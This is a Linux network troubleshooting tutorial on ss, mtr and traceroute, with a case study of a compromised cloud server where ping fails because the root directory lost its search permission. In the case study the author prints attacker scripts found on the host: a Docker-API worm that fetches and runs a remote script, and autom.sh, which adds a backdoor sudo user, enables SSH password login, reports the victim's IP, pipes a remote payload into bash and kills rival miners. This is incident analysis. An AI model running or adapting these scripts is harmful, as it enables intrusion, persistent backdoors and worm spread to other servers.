Network troubleshooting tools: mtr and traceroute

netstat/ss

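netstat is provided by the net-tools package; ss is provided by iproute (iproute2).

iproute has largely superseded net-tools, which many distributions now treat as deprecated.

The practical difference is that ss is faster than netstat.

The reason lies in how each tool gets its data. netstat parses the text tables under /proc/net and, when asked for process information, also walks the per-PID directories under /proc. ss instead queries the kernel directly through tcp_diag, a diagnostics and statistics module in the TCP stack that delivers first-hand socket information from the Linux kernel. As a result ss uses far less time and far fewer resources than netstat, especially on hosts with many connections.
If tcp_diag is not available, ss still works by falling back to /proc/net; it is somewhat slower in that mode but still faster than netstat.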
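
As a small illustration of working with ss output, the sketch below tallies TCP sockets by state. It assumes the usual layout of ss -tan (one header line, then one socket per line with the state in the first column). The function name tcp_state_counts is made up for this example.

```shell
#!/bin/sh
# Tally TCP sockets by state from `ss -tan` output read on stdin.
# Assumption: line 1 is the header and column 1 of every other line
# is the socket state (LISTEN, ESTAB, TIME-WAIT, ...).
tcp_state_counts() {
    awk 'NR > 1 && NF { count[$1]++ }
         END { for (s in count) print count[s], s }' |
        LC_ALL=C sort -k1,1nr -k2,2   # most frequent state first
}

# Typical use on a live system:
#   ss -tan | tcp_state_counts
```

Reading from stdin keeps the function usable on saved output as well as on a live system.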

route 

nmap

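mtr: locating the point of packet loss

mtr is typically run in both directions, from client to server and from server to client, to locate where packets are being lost. Install it with yum install mtr.

mtr (My traceroute) combines the functions of ping and traceroute in a single tool, which makes it more capable than either.

By default mtr probes the path with ICMP packets. Pass -u to probe with UDP packets instead.

traceroute traces the path in a single pass, whereas mtr keeps probing every node on the path and reports statistics for each one. This smooths out momentary fluctuations at individual nodes, so its results are more reliable. Prefer mtr when it is available.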

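Command: mtr -n -i 1 -c 10 www.baidu.com

Options:

-n  do not resolve hostnames

-i  interval between probes, in seconds

-c  number of probes to send

-r  report mode: print the final report and exit

Columns in the output: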

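  • Host   IP address or hostname of the hop

  • Loss   packet loss rate

  • Snt    number of probes sent

  • Last   latency of the most recent reply

  • Avg    average latency

  • Best   shortest latency

  • Wrst   longest latency

  • StDev  standard deviation of the latency

Examples:

From server to client, loss that starts at the very first hop suggests a problem on the server itself.

From client to server, loss that appears only at the last hop almost certainly points to a problem inside the server's operating system.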
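
The reading rules above can be sketched as a small filter over a saved mtr report. It assumes the report layout printed by mtr -rn, where each hop line starts with a hop number followed by ".|--", then the host and the loss percentage. The function name is hypothetical. The heuristic is a common rule of thumb rather than anything mtr reports itself: loss seen at a middle hop but not at later hops is usually just that router rate-limiting its replies, so only loss that continues through to the final hop is treated as real.

```shell
#!/bin/sh
# Read an `mtr -rn` report on stdin and print the first hop from which
# packet loss continues all the way to the destination.
# Assumption: hop lines look like "  4.|-- 10.0.3.1   20.0%   10  ...".
persistent_loss_start() {
    awk '
        /^ *[0-9]+\.\|--/ {
            n++
            host[n] = $2
            loss[n] = $3
            sub(/%/, "", loss[n])        # "20.0%" -> "20.0"
        }
        END {
            if (n == 0) { print "no hops parsed"; exit 1 }
            if (loss[n] + 0 == 0) { print "no loss at the final hop"; exit 0 }
            i = n
            # Walk back while the previous hop also shows loss.
            while (i > 1 && loss[i - 1] + 0 > 0) i--
            printf "loss persists from hop %d (%s, %s%%)\n", i, host[i], loss[i]
        }
    '
}

# Typical use:
#   mtr -rn -c 10 www.baidu.com | persistent_loss_start
```

Running it once from each side, as the text recommends, gives two starting points to compare.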

 

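traceroute: locating routers

traceroute discovers the routers between source and destination by sending probes with increasing TTL values and collecting the ICMP Time Exceeded replies. On Linux the probes are UDP datagrams by default. Install it with yum install traceroute. The Windows equivalent is tracert.

Usage: traceroute [options] host

Options: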

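-d  enable socket-level debugging.

-f  set the TTL of the first probe packet.

-F  set the "don't fragment" bit.

-g  route probes through the given source-route gateway; up to 8 may be specified.

-i  send probes through the specified network interface.

-I  use ICMP echo requests instead of UDP datagrams.

-m  set the maximum TTL (maximum number of hops) for probes.

-n  show IP addresses instead of hostnames.

-p  set the port used by the UDP probes.

-r  bypass the normal routing table and send packets directly to the remote host.

-s  set the source IP address of outgoing probes.

-t  set the TOS value of probe packets.

-v  show verbose output.

-w  set how long to wait for a reply from the remote host.

-x  enable or disable packet checksum verification.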

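Example:

In the trace below, which sends TCP probes (-T) to port 135, nothing comes back after hop 11. This suggests that traffic to that port is blocked at or just beyond that node. A lookup shows the node belongs to Beijing Mobile, so the next step is to contact the carrier, either directly or through Alibaba Cloud after-sales support, for further investigation.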

[root@mycentos ~]# traceroute -T -p 135 www.baidu.com
traceroute to www.baidu.com (111.13.100.92), 30 hops max, 60 byte packets
 1  * * *
 2  192.168.17.20 (192.168.17.20)  4.115 ms  4.397 ms  4.679 ms
 3  111.1.20.41 (111.1.20.41)  901.921 ms  902.762 ms  902.338 ms
 4  111.1.34.197 (111.1.34.197)  2.187 ms  1.392 ms  2.266 ms
 5  * * *
 6  221.183.19.169 (221.183.19.169)  1.688 ms  1.465 ms  1.475 ms
 7  221.183.11.105 (221.183.11.105)  27.729 ms  27.708 ms  27.636 ms
 8  * * *
 9  * * *
10  111.13.98.249 (111.13.98.249)  28.922 ms 111.13.98.253 (111.13.98.253)  29.030 ms  28.916 ms
11  111.13.108.22 (111.13.108.22)  29.169 ms  28.893 ms 111.13.108.33 (111.13.108.33)  30.986 ms
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * * *
18  * * *
19  * * *
20  * * *
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *
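
Finding the last hop that answered can be done mechanically on a long trace. The sketch below reads traceroute output on stdin and prints the number of the last hop with at least one reply; it assumes hop lines begin with the hop number and that every reply carries a time in ms, as in the trace above. The function name is made up for this example.

```shell
#!/bin/sh
# Print the number of the last hop that returned at least one reply.
# Assumption: hop lines start with the hop number, and a reply always
# shows a round-trip time followed by "ms"; "* * *" lines have none.
last_replying_hop() {
    awk '
        $1 ~ /^[0-9]+$/ && / ms/ { hop = $1 }
        END {
            if (hop == "") { print "no replies"; exit 1 }
            print hop
        }
    '
}

# Typical use:
#   traceroute -T -p 135 www.baidu.com | last_replying_hop
```

Fed the trace above, it prints 11.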

 

 

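A painful case of ping: unknown host

Background:

 On a customer's ECS instance, pinging a domain name fails with unknown host, while pinging an IP address works. A packet capture taken during the ping shows no DNS query leaving the machine. Is this a name resolution problem?

1. Ping the domain name while capturing packets: no DNS query goes out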

# ping www.baidu.com -c 1
ping: unknown host www.baidu.com
# tcpdump -i any port 53 -nnvv
tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes

2. Pinging by IP, dig, and getent all work normally

# ping -c 1 115.239.210.27
PING 115.239.210.27 (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.87 ms

--- 115.239.210.27 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.875/1.875/1.875/0.000 ms
# getent hosts www.baidu.com
115.239.211.112 www.a.shifen.com www.baidu.com
115.239.210.27  www.a.shifen.com www.baidu.com
# dig www.baidu.com +short
www.a.shifen.com.
115.239.210.27
115.239.211.112

3. These tests show that DNS itself is working; the problem lies with ping

4. Use strace to check whether ping has trouble opening files while it runs

# strace -e open ping www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libattr.so.1", O_RDONLY|O_CLOEXEC) = 3
......
open("/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
ping: unknown host www.baidu.com
+++ exited with 2 +++
For comparison, a healthy machine (output differs between versions):
# strace -e open ping -c 1 www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcrypto.so.10", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
.......
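
The denied paths in a trace like the failing one above can be pulled out mechanically. The sketch below reads saved strace output on stdin and prints each path whose open failed with EACCES, once. It assumes the line format shown above and also accepts openat lines, since newer systems tend to use openat (there, tracing with strace -e trace=open,openat may be needed). The function name is hypothetical.

```shell
#!/bin/sh
# Print the unique paths whose open()/openat() call failed with EACCES.
# Assumption: one syscall per line, starting at column 0, with the path
# as the first double-quoted argument (as written by `strace -o FILE`).
denied_paths() {
    sed -n 's/^open[a-z]*([^"]*"\([^"]*\)".*EACCES.*/\1/p' |
        LC_ALL=C sort -u
}

# Typical use:
#   strace -e trace=open,openat -o p.out ping -c 1 www.baidu.com
#   denied_paths < p.out
```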

5. Collect every file that hit Permission denied and check its permissions (output trimmed)

# strace -e open -o p.out ping www.baidu.com; grep -i "Permission denied" p.out | awk -F '"' '{print $2}' | xargs stat
  File: ‘/usr/lib/locale/locale-archive’
  Size: 106065056     Blocks: 207096     IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132883      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.523000000 +0800
Modify: 2015-07-13 15:21:14.804155630 +0800
Change: 2015-07-13 15:21:14.804155630 +0800
 Birth: -
  File: ‘/usr/share/locale/locale.alias’
  Size: 2502          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132816      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:48:09.380738442 +0800
Modify: 2015-03-06 05:18:56.000000000 +0800
Change: 2015-07-13 15:21:09.324089405 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules.cache’
  Size: 26254         Blocks: 56         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394951      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.878000000 +0800
Modify: 2015-07-13 15:21:15.860168393 +0800
Change: 2015-07-13 15:21:15.860168393 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules’
  Size: 56377         Blocks: 112        IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394941      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2015-07-13 15:21:15.857168356 +0800
Modify: 2015-03-06 05:18:55.000000000 +0800
Change: 2015-07-13 15:21:15.510164163 +0800
 Birth: -
  File: ‘/etc/resolv.conf’
  Size: 109           Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 660033      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:50:51.650325504 +0800
Modify: 2019-05-10 21:47:49.650000000 +0800
Change: 2019-05-10 21:47:49.650000000 +0800
 Birth: -
  File: ‘/etc/nsswitch.conf’
  Size: 1728          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658832      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:44.965000000 +0800
Modify: 2015-07-13 15:21:28.905326045 +0800
Change: 2015-07-13 15:21:28.905326045 +0800
 Birth: -
  File: ‘/etc/ld.so.cache’
  Size: 44226         Blocks: 88         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658829      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:33.738000000 +0800
Modify: 2019-03-22 00:16:26.262531411 +0800
Change: 2019-03-22 00:16:26.262531411 +0800
 Birth: -
  File: ‘/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -
  File: ‘/usr/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -

6. The file permissions show nothing obviously wrong either. At this point I was stumped and had to stop and think.

7. Investigate the possibility of a compromise: verify the RPM packages, replace the ping binary, and look for traces of intrusion

#  for i in $(rpm -qa);do rpm --verify $i ||echo $i ;done|grep bin |grep -v "node_modules"
S.5......    /usr/bin/git
S.5......    /usr/bin/git-receive-pack
S.5......    /usr/bin/git-shell
S.5......    /usr/bin/git-upload-archive
S.5......    /usr/bin/git-upload-pack
# lsmod
Module                  Size  Used by
tcp_diag               12591  0
inet_diag              18543  1 tcp_diag
dm_mirror              22135  0
......
ata_piix               35038  0
i2c_core               40325  3 drm,i2c_piix4,drm_kms_helper
libata                218854  3 pata_acpi,ata_generic,ata_piix

Nothing obviously abnormal in the commands, processes, or kernel modules.
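
The verification step can also be run as a single rpm -Va, which checks every installed package at once, and then filtered. The sketch below keeps only files under a bin or sbin directory whose content digest changed. It assumes the usual verify output, where the first column is a flag string with 5 in the third position when the digest differs and the path is the last field. The function name is made up for this example, and paths containing spaces are not handled.

```shell
#!/bin/sh
# Filter `rpm -Va` output (stdin) down to executables whose digest changed.
# Assumption: column 1 is the flag string (e.g. "S.5......") and the
# file path is the last whitespace-separated field.
digest_changed_binaries() {
    awk '$1 ~ /^..5/ && $NF ~ /\/s?bin\// { print $NF }'
}

# Typical use (can take several minutes on a large system):
#   rpm -Va 2>/dev/null | digest_changed_binaries
```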

8. Back to the problem itself: access is being denied, so go to the root directory and check permissions entry by entry

# ls -l
total 136
-rwxrwxrwx    1 root root  1963 Feb 27 03:38 autom.sh
lrwxrwxrwx.   1 root root     7 Nov 21  2014 bin -> usr/bin
dr-xr-xr-x.   4 root root  4096 May 10 21:47 boot
drwxr-xr-x   19 root root  3040 May 10 21:50 dev
drwxr-xr-x. 102 root root 12288 May 10 21:50 etc
drwxr-xr-x.   8 root root  4096 Mar 22 00:15 home
lrwxrwxrwx.   1 root root     7 Nov 21  2014 lib -> usr/lib
lrwxrwxrwx.   1 root root     9 Nov 21  2014 lib64 -> usr/lib64
drwxrwxrwx    2 root root  4096 Jan 29 17:57 logs
drwx------.   2 root root 16384 Nov 22  2014 lost+found
drwxr-xr-x.   2 root root  4096 Jun 10  2014 media
drwxr-xr-x.   3 root root  4096 Oct 23  2015 mnt
lrwxrwxrwx    1 root root     9 Oct 23  2015 opt -> /mnt/opt/
drwxrwxr-x    3 root root  4096 Oct  9  2018 path
dr-xr-xr-x   93 root root     0 May 10 21:50 proc
dr-xr-x---.  30 root root  4096 May 10 23:36 root
drwxr-xr-x   30 root root   840 May 10 21:51 run
lrwxrwxrwx.   1 root root     8 Nov 21  2014 sbin -> usr/sbin
drwxrwxr-x    6 root root  4096 Jan 29 17:54 shell
drwxrwxr-x    7 root root  4096 Jan 29 20:20 springbootdemo2
drwxr-xr-x.   2 root root  4096 Jun 10  2014 srv
dr-xr-xr-x   13 root root     0 May 11  2019 sys
-rwxrwxrwx    1 root root   356 Nov  1  2018 test1.sh
-rwxrwxrwx    1 root root   127 Nov  1  2018 test2.sh
drwxrwxrwt.  26 root root 40960 May 11 00:10 tmp
drwxrwxr-x    3 root root  4096 Dec 22 14:48 Users
drwxr-xr-x.  14 root root  4096 Aug  6  2018 usr
drwxr-xr-x.  23 root root  4096 May  6 11:31 var

9. The permissions look fine, but a few scripts turn up in the listing. See what they do

# cat test1.sh test2.sh
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
echo NOW WORKING ON $HOSTLINE
docker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "yum install wget -y;apt-get install wget -y;wget http://51.*.*.146/autom.sh -O /autom.sh;chmod 777 /autom.sh;sh /autom.sh"
echo DONE WITH $HOSTLINE
sed -i '1d' $1
done <$1
-----------------
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
sh test1.sh $1 & sleep 7; sed -i '1d' $1;
done <$1
-----------------
# cat autom.sh
#!/bin/sh
useradd -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
adduser -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
usermod -aG sudoers akay;
usermod -aG root akay;
sudo adduser akay sudo;
echo 'akay  ALL=(ALL:ALL) ALL' >> /etc/sudoers;
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config;
curl icanhazip.com >/tmp/myip.txt
ip=$(cat /tmp/myip.txt)
curl http://51.*.*.146/ip.php?ip=$ip
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
/etc/rc.d/sshd restart;
systemctl restart sshd;
systemctl restart ssh;
apt-get install screen -y
yum install screen -y
if [ $(dpkg-query -W -f='${Status}' systemd 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install systemd -y;
  yum install systemd -y;
fi;
if [ $(dpkg-query -W -f='${Status}' masscan 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install masscan -y;
  yum install masscan -y;
fi;
if [ $(dpkg-query -W -f='${Status}' iproute2 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install iproute2 -y;
  yum install iproute2 -y;
fi;
curl -s http://51.*.*.146/logo9.jpg | bash -s
wget http://51.*.*.146/test1.sh -O test1.sh;
wget http://51.*.*.146/test2.sh -O test2.sh;
#wget http://51.*.*.146/scanner.sh -O scanner.sh;
sleep 2s;
chmod 777 test1.sh;
chmod 777 test2.sh;
sleep 2s;
killall xmrig;
killall xm;
killall proc;
killall minergate-cli;
killall xmr-stak;
pkill -f xmrig;
pkill -f xmr-stak;
pkill -f xm;
kill -9 xmrig;
kill -9 xmr-stak;
kill -a xmrig;
kill -a xmr-stak;
kill -a xm;
sudo killall minergate-cli;
sudo kill -9 minergate-cli;
sudo pkill -f minergate-cli;
sudo killall proc;
sudo kill -9 proc;
sudo pkill -f proc;
sudo killall xmrig;
sudo killall xmr-stak;
sudo pkill -f xmrig;
sudo pkill -f xmr-stak;
sudo kill -9 xmrig;
sudo kill -9 xmr-stak;
sudo kill -a xmrig;
sudo kill -a xmr-stak;
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl disable bashd.service;
#sudo sh scanner.sh &
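
The changes autom.sh makes suggest a few quick checks on any host that may have been hit. The sketch below looks only for indicators visible in the script above: the akay account, its sudoers line, and password logins enabled in sshd_config. The function name and the idea of passing file paths as arguments are assumptions for illustration. Password authentication can also be enabled legitimately, so that line is a hint rather than proof.

```shell
#!/bin/sh
# Report indicators left behind by the autom.sh script shown above.
# The three file paths are parameters so the check can be run against
# copies taken from a suspect machine; defaults are the live files.
check_indicators() {
    passwd_file=${1:-/etc/passwd}
    sudoers_file=${2:-/etc/sudoers}
    sshd_file=${3:-/etc/ssh/sshd_config}
    user=akay   # account name taken from autom.sh

    grep -q "^${user}:" "$passwd_file" 2>/dev/null &&
        echo "account present: $user"
    grep -Eq "^${user}[[:space:]]+ALL=" "$sudoers_file" 2>/dev/null &&
        echo "sudoers grant present: $user"
    grep -Eq '^[[:space:]]*PasswordAuthentication[[:space:]]+yes' \
        "$sshd_file" 2>/dev/null &&
        echo "sshd allows password logins"
    return 0
}

# Typical use, as root on the suspect host:
#   check_indicators
```

test1.sh spreads by running docker -H tcp://HOST against other machines, so it is also worth checking whether the Docker daemon on the host is listening on a TCP port, for example with ss -ltnp.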

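10. So the machine really had been compromised. While advising the customer to purchase an emergency security response service, I kept looking into the ping problem out of curiosity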

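11. A flash of insight: what are the permissions on the root directory itself? (Ignore the timestamps; I reran many tests while writing this article.)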

On the broken machine:
# ls -ld /
dr--------. 22 root root 4096 May 10 21:47 /
On a healthy machine:
# ls -ld /
dr-xr-xr-x. 19 root root 4096 Apr 30 17:33 /
Restore the permissions on the broken machine and retest:
# chmod 555 /
# ping -c 2 www.baidu.com
PING www.a.shifen.com (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.84 ms
64 bytes from 115.239.210.27: icmp_seq=2 ttl=55 time=1.86 ms

--- www.a.shifen.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 1.842/1.854/1.866/0.012 ms

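Problem solved! The root directory had lost its search (x) permission. A plausible explanation for why only ping was affected: the strace output shows ping loading libcap, and ping typically drops most of its capabilities at startup, so even when run by root it no longer bypasses directory permission checks. Without x on /, every later lookup of an absolute path such as /etc/resolv.conf then fails with EACCES, while dig and getent keep root's full privileges and are unaffected.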
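
The lesson of this case is that a file's own mode is not enough: every directory on the way to it must be searchable. The sketch below walks up from a path and prints each ancestor directory that lacks the search (x) bit for other users. It assumes GNU stat (for -c '%A'), and the function name is made up for this example. Where util-linux is installed, namei -l PATH shows similar per-component information.

```shell
#!/bin/sh
# Print every ancestor directory of PATH that is not searchable by
# "other" users, together with its mode string.
# Assumption: GNU stat; -L follows symlinked directories such as /lib64.
missing_search_bit() {
    p=$1
    while [ "$p" != "/" ] && [ "$p" != "." ]; do
        p=$(dirname "$p")
        mode=$(stat -L -c '%A' "$p") || return 1
        case $mode in
            d????????[xt]) ;;                     # other-x present
            *) printf '%s %s\n' "$mode" "$p" ;;   # flag this directory
        esac
    done
}

# Typical use:
#   missing_search_bit /etc/resolv.conf
```

On the broken machine in this article, this would have flagged / with mode dr-------- straight away.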

https://yq.aliyun.com/articles/702074?spm=a2c4e.11153959.0.0.e49327eepZ2Vi3
